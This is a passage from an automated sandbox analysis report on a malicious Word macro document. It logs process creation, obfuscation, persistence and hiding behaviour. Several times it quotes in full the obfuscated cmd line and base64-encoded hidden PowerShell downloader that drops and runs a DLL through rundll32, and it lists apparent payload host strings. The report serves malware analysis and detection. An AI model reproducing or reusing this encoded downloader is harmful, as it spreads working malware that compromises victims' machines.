QAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: ARCH_25_012021.doc Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_ Name: Gusca95luq_
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00292D98 push 00292E25h; ret 7_2_00292E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A0020 push 002A0058h; ret 7_2_002A0050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00294038 push 00294064h; ret 7_2_0029405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026A0B4 push 0026A0E0h; ret 7_2_0026A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026A0B2 push 0026A0E0h; ret 7_2_0026A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026B274 push 0026B2CDh; ret 7_2_0026B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027C34C push 0027C378h; ret 7_2_0027C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026E450 push ecx; mov dword ptr [esp], edx 7_2_0026E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A0498 push 002A04EFh; ret 7_2_002A04E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A04F4 push 002A055Ch; ret 7_2_002A0554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A05B8 push 002A05E4h; ret 7_2_002A05DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B588 push 0029B5CAh; ret 7_2_0029B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A0580 push 002A05ACh; ret 7_2_002A05A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A05F0 push 002A063Ch; ret 7_2_002A0634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A0654 push 002A0680h; ret 7_2_002A0678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A068C push 002A06B8h; ret 7_2_002A06B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026E696 push ecx; mov dword ptr [esp], edx 7_2_0026E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026E6F0 push ecx; mov dword ptr [esp], edx 7_2_0026E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A06C4 push 002A06F0h; ret 7_2_002A06E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026D6DC push 0026D751h; ret 7_2_0026D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00268748 push 00268774h; ret 7_2_0026876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026D754 push 0026D7ADh; ret 7_2_0026D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026E750 push ecx; mov dword ptr [esp], edx 7_2_0026E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A37A8 push 002A37E0h; ret 7_2_002A37D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00268798 push 002687C4h; ret 7_2_002687BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A07E4 push 002A0827h; ret 7_2_002A081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A0834 push 002A0860h; ret 7_2_002A0858
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A086C push 002A0898h; ret 7_2_002A0890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A3848 push 002A3874h; ret 7_2_002A386C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C8A4 push 0026C8E6h; ret 7_2_0026C8DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C8A2 push 0026C8E6h; ret 7_2_0026C8DE

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Xsugi\zrfn.shd Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xsugi\zrfn.shd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Omuzql\aridm.cve:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
